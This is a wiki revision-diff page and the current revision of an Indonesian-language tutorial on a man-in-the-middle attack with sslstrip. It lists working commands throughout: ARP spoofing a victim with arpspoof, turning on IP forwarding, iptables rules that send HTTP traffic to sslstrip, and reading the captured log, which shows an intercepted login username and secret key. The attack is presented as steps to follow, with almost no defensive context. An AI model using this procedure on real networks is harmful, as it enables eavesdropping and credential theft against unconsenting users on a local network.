Difference between revisions of "MITM: sslstrip"
Jump to navigation
Jump to search
Onnowpurbo (talk | contribs) |
Onnowpurbo (talk | contribs) |
||
(16 intermediate revisions by the same user not shown) | |||
Line 8: | Line 8: | ||
route -n | route -n | ||
netstat -nr | netstat -nr | ||
+ | |||
+ | ==aktifkan ip forwarding== | ||
enable forward paket, | enable forward paket, | ||
− | echo | + | echo 1 > /proc/sys/net/ipv4/ip_forward |
+ | sysctl -w net.ipv4.ip_forward=1 | ||
+ | |||
+ | ==arp spoofing== | ||
lakukan arpspoof, | lakukan arpspoof, | ||
Line 17: | Line 22: | ||
arpspoof -i eth0 -t victimip routerip | arpspoof -i eth0 -t victimip routerip | ||
− | arpspoof - | + | arpspoof -i eth0 -t 192.168.0.106 192.168.0.100 |
192.168.0.106 = ip victim | 192.168.0.106 = ip victim | ||
192.168.0.100 = ip router / gateway / server yang akan di monitor | 192.168.0.100 = ip router / gateway / server yang akan di monitor | ||
Line 32: | Line 37: | ||
Setelah arpspoof di jalankan, lakukan arp -n | Setelah arpspoof di jalankan, lakukan arp -n | ||
+ | arp -n | ||
+ | Address HWtype HWaddress Flags Mask Iface | ||
+ | 192.168.0.13 ether ec:a8:6b:f8:2e:fc C enp3s0 | ||
+ | 192.168.0.146 ether 08:00:27:45:7a:dc C enp3s0 | ||
+ | 192.168.0.223 ether d0:04:92:19:cc:38 C enp3s0 | ||
+ | 192.168.0.7 ether 4c:e6:76:1f:15:4c C enp3s0 | ||
+ | 192.168.0.100 ether 08:00:27:45:7a:dc C enp3s0 | ||
+ | |||
+ | Perhatikan MAC address 192.168.0.100 berubah :) .. | ||
+ | |||
+ | ==redirect packet== | ||
+ | |||
+ | redirect inbound traffic ke port 80 (http), menuju port 8080 (sslstrip). | ||
+ | |||
+ | iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080 | ||
+ | iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 | ||
+ | |||
+ | |||
+ | Untuk redirect HTTPS (port 443) kayanya masih bermasalah baik untuk sslstrip maupun mitmproxy | ||
+ | |||
+ | ==sslstrip== | ||
+ | |||
+ | Jalankan sslstrip agar listen pada port 8080 | ||
+ | |||
+ | cd ~ | ||
+ | sslstrip -l 8080 (untuk kali linux) | ||
+ | python sslstrip.pl –l 8080 (untuk backtrack) | ||
+ | |||
+ | ==lihat log== | ||
+ | |||
+ | hasil penyadapan bisa dilihat di sslstrip.log, misalnya, | ||
+ | cd ~ | ||
+ | tail sslstrip.log | ||
+ | more sslstrip.log | ||
− | + | 2017-04-04 17:07:16,065 POST Data (192.168.0.100): | |
+ | login_username=onno&secretkey=123456&js_autodetect_results=1&just_logged_in=1 | ||
− | |||
− | + | ==Crashing== | |
− | + | Entah kenapa sslstrip ini suka crash :( ... | |
− | |||
+ | Solusinya, coba tambahkan > /dev/null | ||
+ | sslstrip -k -f -l 10000 2> /dev/null | ||
Latest revision as of 09:23, 3 October 2018
Sumber: https://www.cybrary.it/0p3n/sslstrip-in-man-in-the-middle-attack/
Langkah untuk melakukan serangan menggunakan ssltrip adalah sebagai berikut.
Cek routing,
route -n netstat -nr
aktifkan ip forwarding
enable forward paket,
echo 1 > /proc/sys/net/ipv4/ip_forward sysctl -w net.ipv4.ip_forward=1
arp spoofing
lakukan arpspoof,
arpspoof -i eth0 -t victimip routerip
arpspoof -i eth0 -t 192.168.0.106 192.168.0.100 192.168.0.106 = ip victim 192.168.0.100 = ip router / gateway / server yang akan di monitor
Cek apakah berhasil, arp -n di 192.168.0.106
arp -n Address HWtype HWaddress Flags Mask Iface 192.168.0.13 ether ec:a8:6b:f8:2e:fc C enp3s0 192.168.0.223 ether d0:04:92:19:cc:38 C enp3s0 192.168.0.7 ether 4c:e6:76:1f:15:4c C enp3s0 192.168.0.100 ether 66:31:65:39:62:38 C enp3s0
Setelah arpspoof di jalankan, lakukan arp -n
arp -n Address HWtype HWaddress Flags Mask Iface 192.168.0.13 ether ec:a8:6b:f8:2e:fc C enp3s0 192.168.0.146 ether 08:00:27:45:7a:dc C enp3s0 192.168.0.223 ether d0:04:92:19:cc:38 C enp3s0 192.168.0.7 ether 4c:e6:76:1f:15:4c C enp3s0 192.168.0.100 ether 08:00:27:45:7a:dc C enp3s0
Perhatikan MAC address 192.168.0.100 berubah :) ..
redirect packet
redirect inbound traffic ke port 80 (http), menuju port 8080 (sslstrip).
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080 iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
Untuk redirect HTTPS (port 443) kayanya masih bermasalah baik untuk sslstrip maupun mitmproxy
sslstrip
Jalankan sslstrip agar listen pada port 8080
cd ~ sslstrip -l 8080 (untuk kali linux) python sslstrip.pl –l 8080 (untuk backtrack)
lihat log
hasil penyadapan bisa dilihat di sslstrip.log, misalnya,
cd ~ tail sslstrip.log more sslstrip.log
2017-04-04 17:07:16,065 POST Data (192.168.0.100): login_username=onno&secretkey=123456&js_autodetect_results=1&just_logged_in=1
Crashing
Entah kenapa sslstrip ini suka crash :( ...
Solusinya, coba tambahkan > /dev/null
sslstrip -k -f -l 10000 2> /dev/null